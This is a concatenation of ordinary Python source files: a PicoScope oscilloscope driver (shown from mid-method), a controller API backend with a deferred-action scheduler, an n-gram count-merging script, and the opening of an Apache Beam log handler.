is not None: left = self._leavers.top_up(self._records) if self._leavers.bufflen == self._leavers.samples: self._tape.record(self._leavers) self._leavers = left else: if self._records.bufflen == self._records.samples: self._tape.record(self._records) else: self._leavers = self._records.side_copy() except Exception as ex: self.last_error = ex.message print "Streaming Callback(%d):" % sys.exc_info()[-1].tb_lineno, self.last_error, type(ex) def get_stored_data(self, mode, downsample, segments=None): """ Dumps current contents of the memory, different downsample modes can be selected :param mode: DownSample mode form RatioModes :type mode: int :param downsample: downsample bin size :type downsample: int :param segments: segment(s) numbers to flush, id None = streaming data is returned :type segments: int, tuple, None :return: status of the call with data as dict struct {segment: { channel: { data: np.array() } } } :rtype: tuple(int, dict) """ if self._handle <= 0: return pico_num("PICO_INVALID_HANDLE"), None for e in (self._collect_event, self._recording_event, self._async_event): if e is not None and e.is_set(): return pico_num("PICO_BUSY"), None modes = self.m.RatioModes.mode2dict(mode) if len(modes) == 0: return pico_num("PICO_RATIO_MODE_NOT_SUPPORTED"), None channels = [c for c in self._channel_set.keys() if self._channel_set[c].enabled] ports = [p for p in self._port_set.keys() if self._port_set[p].enabled] if len(channels) == 0 and len(ports) == 0: return pico_num("PICO_INVALID_CHANNEL"), None if segments is None: stream = True segments = (0,) samples = c_uint32(0) status = ldlib.NoOfStreamingValues(self._chandle, byref(samples)) if status != pico_num("PICO_OK"): return status, None if samples.value == 0: return pico_num("PICO_DATA_NOT_AVAILABLE") samples = samples.value else: stream = False samples = int(self.info.memps / len(channels + ports)) if isinstance(segments, int): segments = (segments,) data = {} with self._async_lock: for s in segments: data[s] = {} 
for n in channels + ports: data[s][n] = {} for m in modes: bufflen = samples if modes[m] == self.m.RatioModes.none else int(samples / downsample) if modes[m] == self.m.RatioModes.agg: data[s][n]["min"] = np.empty(bufflen, dtype=c_int16) data[s][n]["max"] = np.empty(bufflen, dtype=c_int16) status = self._set_data_buffers(line=n, buffer_max=data[s][n]["max"].ctypes, buffer_min=data[s][n]["min"].ctypes, bufflen=bufflen, segment=s, mode=modes[m]) else: data[s][n][m] = np.empty(bufflen, dtype=c_int16) status = self._set_data_buffers(line=n, buffer_max=data[s][n][m].ctypes, buffer_min=None, bufflen=bufflen, segment=s, mode=modes[m]) if status != pico_num("PICO_OK"): return status, None try: if stream: self._async_cb_type = self._streaming_ready() else: self._async_cb_type = self._data_ready() self._async_cb_func = self._async_cb_type(self._async_cb) if self._async_event.is_set(): self._async_event.clear() status = self._get_values_async(start=0, samples=samples, ratio=downsample, mode=mode, segment=s, ref_cb=self._async_cb_func, ref_cb_param=None) except Exception as ex: self.last_error = ex.message print "Async Data(%d):" % sys.exc_info()[-1].tb_lineno, self.last_error, type(ex) if not self._async_event.is_set(): self._async_event.set() status = pico_num("PICO_OPERATION_FAILED") if status != pico_num("PICO_OK"): if self._async_event.is_set(): self._async_event.clear() return status, None self._async_event.wait() for n in channels + ports: for m in modes: self._set_data_buffers(line=n, buffer_max=None, buffer_min=None, bufflen=samples, segment=s, mode=modes[m]) if self._async_event.is_set(): self._async_event.clear() return pico_num("PICO_OK"), data def _async_cb(self, *param): """ Callback function for async device data """ try: if self._async_event is not None: self._async_event.set() except: return def _get_values_async(self, start, samples, ratio, mode, segment, ref_cb, ref_cb_param): return ldlib.GetValuesAsync(self._chandle, c_uint32(start), c_uint32(samples), 
c_uint32(ratio), c_int32(mode), c_uint32(segment), ref_cb, ref_cb_param) def ets_setup(self, mode, cycles, interleaves): """ Configures ETS collection parameters :param mode: ETS mode as in ETSModes :type mode: int :param cycles: number of cycles to store :type cycles: int :param interleaves: number of uniform collection sets to use :type interleaves: int :returns: status of the call :rtype: int """ if self._handle <= 0: return pico_num("PICO_INVALID_HANDLE") if mode not in self.m.ETSModes.map: return pico_num("PICO_ETS_NOT_SUPPORTED") if interleaves > cycles: return pico_num("PICO_INVALID_PARAMETER") self._ets.mode = mode self._ets.cycles = cycles self._ets.interleaves = interleaves return pico_num("PICO_OK") def get_ets_status(self): """ Returns status of latest ETS collection :returns: status and collection interval in picoseconds :rtype: tuple(int, int) """ return self._ets.status, self._ets.picos def set_simple_trigger(self, enabled, source, threshold, direction, delay=0, waitfor=0): """ Sets simple trigger (Doh...). If Advanced already on - remove it. :param enabled: enable the trigger or... not. hm... :type enabled: bool :param source: trigger channel/source as in TriggerChannels :type source: int :param threshold: vertical ratio of the current channel range as value from <-1.0, 1.0> :type threshold: float :param direction: trigger direction as in TriggerChannelDirections :type direction: int :param delay: delay trigger detection by times of sample interval :type delay: int :param waitfor: autotrigger time in miliseconds, 0 to wait for eva... 
:type waitfor: int :returns: status of the calls :rtype int: """ if self._handle <= 0: return pico_num("PICO_INVALID_HANDLE") if True in [c.is_set() for c in self.trigger_conditions]: self.set_advanced_trigger(conditions=None) if True in [c.is_set() for c in self.pwq_conditions]: self.set_pwq_trigger(conditions=None) adc = int((threshold * 1.0 - int(threshold * 0.999999)) * self.info.max_adc) status = ldlib.SetSimpleTrigger(self._chandle, c_int16(enabled), c_int32(source), c_int16(adc), c_int32(direction), c_uint32(delay), c_int16(waitfor)) if status == pico_num("PICO_OK"): self.trigger = enabled self.trigg_source = source self.trigg_threshold = threshold self.trigg_direction = direction return status def set_horizontal_trigger_ratio(self, ratio): """ Sets horizontal ration of Trigger Events :param ratio: collection block ratio to set trigger to as in <0.0, 1.0> :type ratio: float :returns: status of the call :rtype: int """ if self._handle <= 0: return pico_num("PICO_INVALID_HANDLE") self.trigg_ratio = abs(ratio) % 1.000000001 return pico_num("PICO_OK") def create_trigger_channel_properties(self, channel, upperbound=0.5, upperhys=0.25, lowerbound=-0.5, lowerhys=0.25, mode=None, direction=None): """ (helper) Constructs TriggerProperty object :param channel: Channel enum from TriggerChannels :type channel: int :param upperbound: upper threshold point as a ratio of whole channel in range <-1.0, 1.0> :type upperbound: float :param upperhys: upper threshold hysteresis parameter as a ratio of whole channel in range <0.0, 1.0> :type upperhys: float :param lowerbound: lower threshold point as a ratio of whole channel in range <-1.0, 1.0> :type lowerbound: float :param lowerhys: lower threshold hysteresis parameter as a ratio of whole channel in range <0.0, 1.0> :type lowerhys: float :param mode: Enum from ThresholdModes :type mode: int :param direction: Enum from ThresholdDirections :type direction: int :return: Trigger properties object with values set to match current 
device :rtype: TriggerChannelProperties """ if self._handle <= 0 \ or mode not in self.m.ThresholdModes.map \ or direction not in self.m.ThresholdDirections.map: return None if mode is None: mode = self.m.ThresholdModes.window if direction is None: direction = self.m.ThresholdDirections.enter return self.m.TriggerChannelProperties( channel=channel, threshUpperADC=int((upperbound * 1.0 - int(upperbound * 0.999999)) * self.info.max_adc), threshUpperHys=int((abs(float(upperhys)) % 1) * 2 * self.info.max_adc), threshLowerADC=int((lowerbound * 1.0 - int(lowerbound * 0.999999)) * self.info.max_adc), threshLowerHys=int((abs(float(lowerhys)) % 1) * 2 * self.info.max_adc), threshMode=mode, direction=direction) def set_advanced_trigger(self, conditions=None, analog=None, digital=None, waitfor=0): """ Passes advanced triggering setup to the driver :param conditions: tuple of TriggerConditions objects, they are joined by OR operand. None to turn off :type conditions: tuple, None :param analog: tuple of TriggerChannelProperties objects, None to ignore all :type analog: tuple, None :param digital: tuple of tuple pairs (bit, trigger digital direction) :type digital: tuple, None :param waitfor: time in miliseconds, how long to wait for trigger to occur. 
If 0 - indefinitely :param waitfor: int :return: final status of subsequent calls :rtype: int """ if self._handle <= 0: return pico_num("PICO_INVALID_HANDLE") conditions = conditions if conditions is not None else () analog = analog if analog is not None else () digital = digital if digital is not None and self.info.num_ports > 0 else () if not isinstance(conditions, (tuple, list)): return pico_num("PICO_INVALID_CONDITION_INFO") if not isinstance(analog, (tuple, list)): return pico_num("PICO_INVALID_TRIGGER_PROPERTY") if not isinstance(digital, (tuple, list)): return pico_num("PICO_INVALID_DIGITAL_TRIGGER_DIRECTION") # turn off simple trigger if present: if self.trigger: status = self.set_simple_trigger(enabled=False, source=self.trigg_source, threshold=self.trigg_threshold, direction=self.trigg_direction) if status != pico_num("PICO_OK"): return status # load analog properties and directions first analogout = () analogdir = self.m.TriggerChannelDirections() if len(analog) > 0: # scan and discards duplicates triggchans = () for p in analog: if not isinstance(p, self.m.TriggerChannelProperties) or p.channel not in self.m.TriggerChannels.map: continue if p.channel not in triggchans: triggchans += (p.channel,) if p.direction in self.m.ThresholdDirections.map: analogdir[self.m.TriggerChannels.labels[p.channel]] = p.direction else: analogdir[self.m.TriggerChannels.labels[p.channel]] = self.m.ThresholdDirections.none p.direction = self.m.ThresholdDirections.none analogout += (p,) if len(analogout) > 0: analogprops = cast(((self.m.TriggerChannelPropertiesStruct * len(analogout))()), POINTER(self.m.TriggerChannelPropertiesStruct)) for i in range(0, len(analogout)): analogprops[i] = analogout[i].to_struct() else: analogprops = None status = ldlib.SetTriggerChannelDirections( self._chandle, c_int32(analogdir[self.m.TriggerChannels.labels[self.m.TriggerChannels.A]]), c_int32(analogdir[self.m.TriggerChannels.labels[self.m.TriggerChannels.B]]), 
c_int32(analogdir[self.m.TriggerChannels.labels[self.m.TriggerChannels.C]]), c_int32(analogdir[self.m.TriggerChannels.labels[self.m.TriggerChannels.D]]), c_int32(analogdir[self.m.TriggerChannels.labels[self.m.TriggerChannels.Ext]]), c_int32(analogdir[self.m.TriggerChannels.labels[self.m.TriggerChannels.Aux]]) ) if status != pico_num("PICO_OK"): return status status = ldlib.SetTriggerChannelProperties( self._chandle, analogprops, c_int16(len(analogout)), c_int16(0), c_int32(waitfor)) if status != pico_num("PICO_OK"): return status # now do the digital digitalout = () if len(digital) > 0 and self.info.num_ports > 0: triggbits = () for d in digital: if not isinstance(d, tuple) \ or len(d) != 2 or d[0] in triggbits \ or True not in [d[0] in t for t in self.m.PortBits.map[:self.info.num_ports]] \ or d[1] not in self.m.DigitalDirections.map: continue digitalout += (d,) triggbits += (d[0],) if len(digitalout) > 0: digitaldirs = cast(((self.m.DigitalChannelDirectionStruct * len(digitalout))()), POINTER(self.m.DigitalChannelDirectionStruct)) for i in range(0, len(digitalout)): digitaldirs[i].portbit = digitalout[i][0] digitaldirs[i].direction = digitalout[i][1] else: digitaldirs = None if self.info.num_ports > 0: status = ldlib.SetTriggerDigitalPortProperties(self._chandle, digitaldirs, c_int16(len(digitalout))) if status != pico_num("PICO_OK"): return status # finally do the conditions conditionsout = () if len(conditions) > 0: for c in conditions: if not isinstance(c, self.m.TriggerConditions) or not c.is_set(): continue conditionsout += (c,) if len(conditionsout) == 0: conditionsout += (self.m.TriggerConditions(),) conds = \ cast(((self.m.TriggerConditionsStruct * len(conditionsout))()), POINTER(self.m.TriggerConditionsStruct)) for i in range(0, len(conditionsout)): conds[i] = conditionsout[i].to_struct() status = ldlib.SetTriggerChannelConditions(self._chandle, conds, c_int16(len(conditionsout))) if status != pico_num("PICO_OK"): return status self.trigger_conditions = 
conditionsout self.trigger_analog = analogout self.trigger_digital = digitalout return pico_num("PICO_OK") def set_pwq_trigger(self, conditions=None, direction=None, lower=0, upper=0, pwqtype=0): """ Pulse width qualifier trigger setup :param conditions: tuple PwqConditions objects, they are joined by OR operand. None to turn off. :type conditions: tuple, None :param direction: Qualifier direction from ThresholdDirections :type direction: int :param lower: lower sample count :type lower: int :param upper: upper sample count :type upper: int :param pwqtype: Qualifier type from PwqTypes :type pwqtype: int :return: status of the call :rtype: int """ if self._handle <= 0: return pico_num("PICO_INVALID_HANDLE") if direction is None: direction = self.m.ThresholdDirections.rising conditions = conditions if conditions is not None else () if not isinstance(conditions, (tuple, list)): return pico_num("PICO_INVALID_CONDITION_INFO") if direction not in self.m.ThresholdDirections.map: return pico_num("PICO_INVALID_TRIGGER_DIRECTION") if pwqtype not in self.m.PwqTypes.map: return pico_num("PICO_PULSE_WIDTH_QUALIFIER") if self.trigger: status = self.set_simple_trigger(enabled=False, source=self.trigg_source, threshold=self.trigg_threshold, direction=self.trigg_direction) if status != pico_num("PICO_OK"): return status condout = () for c in conditions: if not isinstance(c, self.m.PwqConditions) or not c.is_set(): continue condout += (c,) if len(condout) == 0: condout += (self.m.PwqConditions(),) conds = cast(((self.m.PwqConditionsStruct * len(condout))()), POINTER(self.m.PwqConditionsStruct)) for i in range(0, len(condout)): conds[i] = condout[i].to_struct() status = ldlib.SetPulseWidthQualifier(self._chandle, conds, c_int16(len(condout)), c_int32(direction), c_uint32(lower), c_uint32(upper), c_int32(pwqtype)) if status != pico_num("PICO_OK"): return status self.pwq_conditions = condout self.pwq_direction = direction self.pwq_lower = lower self.pwq_upper = upper self.pwq_type = 
pwqtype return pico_num("PICO_OK") def get_trigger_info(self): """ :return: Dictionary with the following trigger information: { condtions: tuple, analog: tuple, digital: tuple, waitfor: int } """ return dict2class(conditions=self.trigger_conditions, analog=self.trigger_analog, digital=self.trigger_digital, waitfor=self.trigg_wait) def get_pwq_trigger_info(self): """ :return: Dictionary with the following pwq trigger information: { condition: tuple direction: int lower: int upper: int pwqtype: int } """ return dict2class(conditions=self.pwq_conditions, direction=self.pwq_direction, lower=self.pwq_lower, upper=self.pwq_upper, pwqtype=self.pwq_type) def is_trigger_set(self): """ Checks whether trigger is set for the next collection :returns: result of the check :rtype: bool """ if self._handle <= 0: return None return self.trigger or (True in [c.is_set() for c in self.trigger_conditions]) def get_trigger_time_offset(self, segment): """ Returns time offset in nanoseconds that occurred in the specified segment :param segment: memory segment number :type segment: int :returns: status of the call, offset :rtype: tuple(int, float) """ if self._handle <= 0: return pico_num("PICO_INVALID_HANDLE") if segment > self._segments: return pico_num("PICO_SEGMENT_OUT_OF_RANGE") offt = c_int64() unit = c_uint32() status = self._get_trigger_time_offset(ref_offsets=byref(offt), ref_units=byref(unit), segment=segment) if status != pico_num("PICO_OK"): return status, None return status, time.value * float(pow(10, TimeUnits.nanofactors(unit.value))) def _get_trigger_time_offset(self, ref_offsets, ref_units, segment): return ldlib.GetTriggerTimeOffset(self._chandle, ref_offsets, ref_units, c_uint32(segment)) def stop(self): """ Stops any pending activities on the device :returns: status of the call :rtype: int """ if self._handle <= 0: return pico_num("PICO_INVALID_HANDLE") for e in (self._collect_event, self._recording_event, self._async_event): if e is not None and e.is_set(): e.set() 
return ldlib.Stop(self._chandle) def close_unit(self): """ Closes currently open unit :returns: status of the call :rtype: int """ if self._handle > 0: self.stop() self.release_all_buffers() status = ldlib.CloseUnit(self._chandle) if status == pico_num("PICO_OK"): self._handle = 0 self._chandle.value = 0 else: status = pico_num("PICO_INVALID_HANDLE") return status def set_simple_sig_gen(self, wave_type, frequency, pk2pk, offset=0): """ Controls setup of simple signal generator :param wave_type: wave type enum as in WaveTypes :type wave_type: int :param frequency: frequency in Hz of the signal to generate :type frequency: float :param pk2pk: signal amplitude in microvolts :type pk2pk: int :param offset: zero offset of the generated signal, in microvolts :type offset: int :returns: status of the call :rtype: int """ if self._handle <= 0: return pico_num("PICO_INVALID_HANDLE") if self.info.has_siggen: return self._set_sig_gen_built_in(offset=offset, pk2pk=pk2pk, wave=wave_type, start=frequency, stop=frequency, increment=0, dwelltime=0, sweep=self.m.SweepTypes.up, extra=self.m.SigExtra.off, shots=0, sweeps=0, trigt=self.m.SigTriggerTypes.falling, trigs=self.m.SigTriggerSource.none, threshold=0) else: return pico_num("PICO_NO_SIGNAL_GENERATOR") def _set_sig_gen_built_in(self, offset, pk2pk, wave, start, stop, increment, dwelltime, sweep, extra, shots, sweeps, trigt, trigs, threshold): return ldlib.SetSigGenBuiltIn(self._chandle, c_int32(offset), c_uint32(pk2pk), c_int16(wave), c_float(start), c_float(stop), c_float(increment), c_float(dwelltime), c_int32(sweep), c_int32(extra), c_uint32(shots), c_uint32(sweeps), c_int32(trigt), c_int32(trigs), c_int16(threshold)) def set_awg_player(self, frequency, waveform, pk2pk, offset=0, mode=None): """ Setup AWG buffer player :param frequency: waveform buffer repeat frequency :type frequency: float :param waveform: one dimensional buffer containing a waveform, len up to awg_size, values in <-32767, 32768> :type waveform: tuple 
:param pk2pk: amplitude of the waveform in microvolts, final values clipped to +/-2V :type pk2pk: long, int :param offset: waveform offset in microvolts, final values clipped to +/-2V :type offset: long, int :param mode: waveform repeat index mode, defaults to single :type mode: int :returns: status of the call :rtype: int """ if self._handle <= 0: return pico_num("PICO_INVALID_HANDLE") if not self.info.has_awg: return pico_num("PICO_AWG_NOT_SUPPORTED") if not isinstance(waveform, tuple): return pico_num("PICO_INVALID_BUFFER") if mode not in self.m.IndexModes.map: return pico_num("PICO_INVALID_BUFFER") if mode is None: mode = self.m.IndexModes.single phase = c_uint32(0) status = ldlib.SigGenFrequencyToPhase(self._chandle, c_double(frequency), c_int32(mode), c_uint32(len(waveform)), byref(phase)) if status != pico_num("PICO_OK"): return status wave = np.array([self.info.awg_min if v < self.info.awg_min else (self.info.awg_max if v > self.info.awg_max else v) for v in waveform], dtype=c_int16) return self._set_sig_gen_arbitrary(offset=offset, pk2pk=pk2pk, phase_start=phase.value, phase_stop=phase.value, phase_inc=0, dwell=0, ref_wave=wave.ctypes, bufflen=len(waveform), sweep=self.m.SweepTypes.up, extra=self.m.SigExtra.off, mode=mode, shots=0, sweeps=0, trigt=self.m.SigTriggerTypes.rising, trigs=self.m.SigTriggerSource.none, threshold=0) def _set_sig_gen_arbitrary(self, offset, pk2pk, phase_start, phase_stop, phase_inc, dwell, ref_wave, bufflen, sweep, extra, mode, shots, sweeps, trigt, trigs, threshold): return ldlib.SetSigGenArbitrary(self._chandle, c_int32(offset), c_uint32(pk2pk), c_uint32(phase_start), c_uint32(phase_stop), c_uint32(phase_inc), c_uint32(dwell), ref_wave, c_int32(bufflen), c_int32(sweep), c_int32(extra), c_int32(mode), c_uint32(shots), c_uint32(sweeps), c_int32(trigt), c_int32(trigs), c_int16(threshold)) def ping_unit(self): """ Checks if current device is alive :returns: status PICO_OK if alive :rtype: int """ if self._handle <= 0: return 
def enumerate_units(loaded_lib):
    """ Module function for enumerating all devices served by this driver

    :param loaded_lib: dict2class object of loaded library bindings
    :type loaded_lib: dict2class
    :returns: list of serials of found devices
    :rtype: list, tuple
    """
    count = c_int16()
    length = c_int16(MAX_NUM_DEVICES * 10)
    serials = create_string_buffer(length.value)
    try:
        loaded_lib.EnumerateUnits(byref(count), serials, byref(length))
    except AttributeError:
        # library build does not export EnumerateUnits
        return ()
    raw = serials.value
    # driver returns a comma-separated serial list; empty string means none
    return tuple(raw.split(",")) if raw else ()
backend.py
from typing import List, Dict, Tuple, Union, Iterator
from json import dumps as jsonify
from threading import Thread
from queue import SimpleQueue as Queue, Empty as QueueEmpty
from multiprocessing import Pipe
# FIX: Connection was used in annotations but never imported
from multiprocessing.connection import Connection
from os import getpid
from multiprocessing.util import _exit_function as multiprocessing_exit_function
import atexit
from datetime import datetime
from functools import partial

from wipi.controller import Controller, controllers
from wipi.scheduler import Scheduler
from wipi.log import get_logger

from .shared_controller import SharedController

log = get_logger(__name__)


class Backend:
    """
    API backend

    Owns the shared controllers, the deferred-action scheduler and the
    per-API-worker result delivery pipe.
    """

    class Error(Exception):
        """Backend errors"""

    def __init__(self, chunking_timeout: float = 20.0):
        """
        :param chunking_timeout: When downstreaming, generate connection "heartbeats"
        (by sending non-meaningful JSON white spaces) if connection is idle
        for this time [s]
        """
        self._chunking_timeout = chunking_timeout

        # Controllers (shared by all API workers)
        self._controllers: Dict[str, Controller] = {
            controller.name: SharedController(controller).start()
            for controller in controllers()
        }

        # Deferred actions scheduler; `self` is injected into scheduled actions
        # as a keyword argument (see set_state_deferred, which schedules the
        # *unbound* Backend.mute_set_state)
        self._scheduler = Scheduler(kwargs={"self": self}).start()

        # Master API worker PID (needed for correct shared resources shutdown)
        self._master_pid = getpid()

        # SharedController worker -> API worker communication pipe
        self._pipe: Tuple[Connection, Connection] = None

        log.info("Backend created")

    def worker_postfork(self) -> None:
        """
        uWSGI postfork hook

        The function is called after uWSGI forks the API workers.
        Creates SharedController worker results delivery pipe for this API worker.
        Deregisters MP exit function in forked API workers (so that they won't
        try to join child processes forked in master).
        """
        self._pipe = Pipe(duplex=False)

        if getpid() == self._master_pid:
            log.info("Master worker ready")
        else:  # forked worker
            atexit.unregister(multiprocessing_exit_function)
            log.info("Worker ready")

    def controllers(self) -> Dict[str, str]:
        """
        :return: List of enabled controllers' names and their types
        """
        return dict((c.name, c.baseclass) for c in self._controllers.values())

    def _get_ctrl(self, cname: str) -> Controller:
        """
        :param cname: Controller name
        :return: Controller or None if it doesn't exist
        """
        return self._controllers.get(cname)

    def get_state(self, cname: str = None) -> Dict:
        """
        Get controller state
        :param cname: Controller name or None (meaning: all controllers)
        :return: Current controller state or dict of (name, state) of all of them
        """
        if cname is None:
            return {
                "controllers": [{
                    "name": cname,
                    "state": self.get_state(cname),
                } for cname in self._controllers.keys()]
            }

        controller = self._get_ctrl(cname)
        return None if controller is None else controller.get_state(*self._pipe)

    def set_state(self, cname: str = None, state: Dict = {}) -> Dict:
        """
        Set controller state
        :param cname: Controller name or None (apply per-controller entries)
        :param state: State change
        :return: Current controller state or dict of (name, state) of all of them
        """
        if cname is None:
            for controller in state["controllers"]:
                self.set_state(controller["name"], controller["state"])
            return self.get_state()

        controller = self._get_ctrl(cname)
        return None if controller is None else controller.set_state(state, *self._pipe)

    def mute_set_state(self, cname: str = None, state: Dict = {}) -> None:
        """
        Set controller state discarding the result
        :param cname: Controller name or None
        :param state: State change
        """
        if cname is None:
            for controller in state["controllers"]:
                self.mute_set_state(controller["name"], controller["state"])
        else:
            controller = self._get_ctrl(cname)
            if controller is not None:
                controller.mute_set_state(state)

    def set_state_deferred(self, cname: str = None, state: Dict = {}) -> None:
        """
        Set controller state later
        :param cname: Controller name or None
        :param state: State change, may carry "at" (date-time spec or list
        thereof, "%Y/%m/%d %H:%M:%S") and "repeat" (list of {"times", "interval"})
        scheduling directives
        :raises Backend.Error: on invalid "at" specification
        """
        def dt_spec2dt(dt_spec) -> datetime:
            return datetime.strptime(dt_spec, "%Y/%m/%d %H:%M:%S")

        # FIX: work on a shallow copy; the original popped scheduling keys from
        # the caller's dict (and, when called without arguments, from the shared
        # mutable default)
        state = dict(state)

        at_spec: Union[str, List[str]] = state.pop("at") if "at" in state else None
        repeats: List[Dict] = state.pop("repeat") if "repeat" in state else []
        if cname:
            state = state.get("state", {})

        # Execution times
        at: List[datetime] = None
        if at_spec is not None:
            if type(at_spec) is str:
                at = [dt_spec2dt(at_spec)]
            elif type(at_spec) is list:
                at = [dt_spec2dt(dt_spec) for dt_spec in at_spec]
            else:
                raise Backend.Error(f"Invalid date-time specification: {at_spec}")

        # Unbound method: the scheduler supplies self (see __init__)
        task = Scheduler.Task(
            partial(Backend.mute_set_state, cname=cname, state=state), at)

        # Repetitions
        for repeat in repeats:
            times: Union[int, str] = repeat.get("times")
            interval = float(repeat.get("interval"))
            task.repeat("forever" if times is None else int(times), interval)

        self._scheduler.schedule(task)

    def list_deferred(self, cname: str = None) -> List[Dict]:
        """
        Get list of deferred actions
        :param cname: Controller name (or None for all controllers)
        :return: List of {"controller", "state", "at"} descriptors
        """
        def dt2dt_spec(dt: datetime) -> str:
            return dt.strftime("%Y/%m/%d %H:%M:%S")

        tasks = self._scheduler.tasks(self._pipe)
        if cname is not None:
            tasks = [t for t in tasks if cname == t.action.keywords["cname"]]

        return [{
            "controller": t.action.keywords["cname"],
            "state": t.action.keywords["state"],
            "at": [dt2dt_spec(dt) for dt in t.at],
        } for t in tasks]

    def cancel_deferred(self) -> None:
        """
        Cancel all scheduled deferred actions
        """
        self._scheduler.cancel()

    def _async_chunks(self, cgens: List[Tuple[str, Iterator[Dict]]]) -> Iterator[Dict]:
        """
        Generate chunks of (aggregate) response stream asynchronously
        :param cgens: Chunk data generators
        :return: JSON response chunks generator (None chunks are heartbeats)
        """
        queue = Queue()
        done = {}  # chunk generation done sentinel (compared by identity)

        def gen_chunk(name: str, cgen: Iterator[Dict]) -> None:
            nonlocal queue
            nonlocal done
            for chunk in cgen:
                queue.put({"name": name, "data": chunk})
            queue.put(done)  # signal that we're finished

        threads = [
            Thread(target=gen_chunk, args=(name, cgen)) for name, cgen in cgens
        ]
        for thread in threads:
            thread.start()

        # Drain the queue until every producer thread has delivered its sentinel
        cgen_alive = len(threads)
        while cgen_alive > 0:
            try:
                chunk = queue.get(timeout=self._chunking_timeout)
                if chunk is done:
                    cgen_alive -= 1
                    continue
            except QueueEmpty:
                chunk = None  # interim chunk (used for connection heartbeats)
            yield chunk

        for thread in threads:
            thread.join()

    def _downstream_chunks(self, query: Dict, cname: str = None) -> Iterator[Dict]:
        """
        Downstream data chunks generator
        :param query: Downstream query
        :param cname: Controller name or None (aggregate all queried controllers)
        :return: Downstream data chunks generator
        """
        if cname is None:
            return self._async_chunks(list(filter(lambda g: g is not None, (
                (ctrl["name"], self._downstream_chunks(ctrl["query"], ctrl["name"]))
                for ctrl in query["controllers"]))))

        controller = self._get_ctrl(cname)
        # FIX: was `*self_pipe` (undefined name) — raised NameError on every
        # single-controller downstream request
        return None if controller is None else controller.downstream(query, *self._pipe)

    def downstream(self, cname: str = None, query: Dict = {}) -> Iterator[str]:
        """
        Downstream data

        Note that if streaming is requested by cname then the stream chunks are
        produced and sent by the uWSGI worker process directly.
        If controler(s) are queried in the query, worker threads are created
        for the chunks production and they are yielded asynchronously
        immediately when they're generated, sort of pell-mell.
        Also, in that case, connection keep-alive heartbeats (in form of harmless
        whitespaces in the JSON response) are sent should the connection remain
        inactive for longer than is safe to keep it alive.
        The same mechanism may be used by controllers themselves---by generating
        None chunk, the interim white space shall be sent.

        :param cname: Controller name or None
        :param query: Downstream query
        :return: Downstream data chunks generator (JSON list fragments)
        """
        separator = "["
        for chunk in self._downstream_chunks(query, cname):
            yield ' ' if chunk is None else separator + jsonify(chunk)
            separator = ", "

        yield "[]" if separator == "[" else "]"  # finish the JSON list stream

    def shutdown(self):
        """
        Shut backend down

        Only the master worker stops the shared resources (scheduler and
        controller workers); forked workers just log.
        """
        if getpid() == self._master_pid:  # this worker is the master
            self._scheduler.stop()

            for controller in self._controllers.values():
                controller.stop()

            log.info("Master worker shut down")

        else:
            log.info("Worker shut down")

    def __del__(self):
        self.shutdown()
countmerge.py
import sys import argparse from Queue import Empty from multiprocessing import Process, Queue from googlengram import indexing from representations import sparse_io_ref import ioutils YEARS = range(1900, 2001) def main(proc_num, queue, out_dir, in_dir): merged_index = ioutils.load_pickle(out_dir + "merged_index.pkl") print proc_num, "Start loop" while True: try: year = queue.get(block=False) except Empty: print proc_num, "Finished" break print proc_num, "Fixing counts for year", year fixed_counts = {} old_mat = sparse_io_ref.retrieve_mat_as_dict(in_dir + str(year) + ".bin") old_index = ioutils.load_pickle(in_dir + str(year) + "-list.pkl") for pair, count in old_mat.iteritems(): try: i_word = old_index[pair[0]] except IndexError: print pair sys.exit(0) c_word = old_index[pair[1]] new_pair = (indexing.word_to_static_id(i_word, merged_index), indexing.word_to_static_id(c_word, merged_index)) fixed_counts[new_pair] = count print proc_num, "Writing counts for year", year sparse_io_ref.export_mats_from_dicts({str(year) : fixed_counts}, out_dir) def run_parallel(num_procs, out_dir, in_dir): queue = Queue() for year in YEARS: queue.put(year) procs = [Process(target=main, args=[i, queue, out_dir, in_dir]) for i in range(num_procs)] for p in procs: p.start() for p in procs: p.join() if __name__ == '__main__': parser = argparse.ArgumentParser(description="Converts yearly counts to have merged index.") parser.add_argument("out_dir", help="directory where the consolidated data will be stored. Must also contain merged index.") parser.add_argument("in_dir", help="path to unmerged data") parser.add_argument("num_procs", type=int, help="number of processes to spawn") args = parser.parse_args() run_parallel(args.num_procs, args.out_dir + "/", args.in_dir + "/")
log_handler.py
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements.  See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License.  You may obtain a copy of the License at
#
#    http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#

"""Beam fn API log handler."""

from __future__ import absolute_import
from __future__ import print_function

import logging
import math
import queue
import sys
import threading
import time
from builtins import range

import grpc

from apache_beam.portability.api import beam_fn_api_pb2
from apache_beam.portability.api import beam_fn_api_pb2_grpc
from apache_beam.runners.worker.channel_factory import GRPCChannelFactory
from apache_beam.runners.worker.worker_id_interceptor import WorkerIdInterceptor

# This module is experimental. No backwards-compatibility guarantees.


class FnApiLogRecordHandler(logging.Handler):
  """A handler that writes log records to the fn API.

  Log records are buffered in a bounded queue by ``emit`` and shipped in
  batches over a gRPC Logging stream by a daemon reader/writer pair.
  """

  # Maximum number of log entries in a single stream request.
  _MAX_BATCH_SIZE = 1000
  # Used to indicate the end of stream.
  _FINISHED = object()
  # Size of the queue used to buffer messages. Once full, messages will be
  # dropped. If the average log size is 1KB this may use up to 10MB of memory.
  _QUEUE_SIZE = 10000

  # Mapping from logging levels to LogEntry levels.
  LOG_LEVEL_MAP = {
      logging.FATAL: beam_fn_api_pb2.LogEntry.Severity.CRITICAL,
      logging.ERROR: beam_fn_api_pb2.LogEntry.Severity.ERROR,
      logging.WARNING: beam_fn_api_pb2.LogEntry.Severity.WARN,
      logging.INFO: beam_fn_api_pb2.LogEntry.Severity.INFO,
      logging.DEBUG: beam_fn_api_pb2.LogEntry.Severity.DEBUG
  }

  def __init__(self, log_service_descriptor):
    """Connect to the logging service and start the background reader.

    :param log_service_descriptor: descriptor carrying the logging service url.
    """
    super(FnApiLogRecordHandler, self).__init__()

    self._alive = True
    self._dropped_logs = 0
    self._log_entry_queue = queue.Queue(maxsize=self._QUEUE_SIZE)

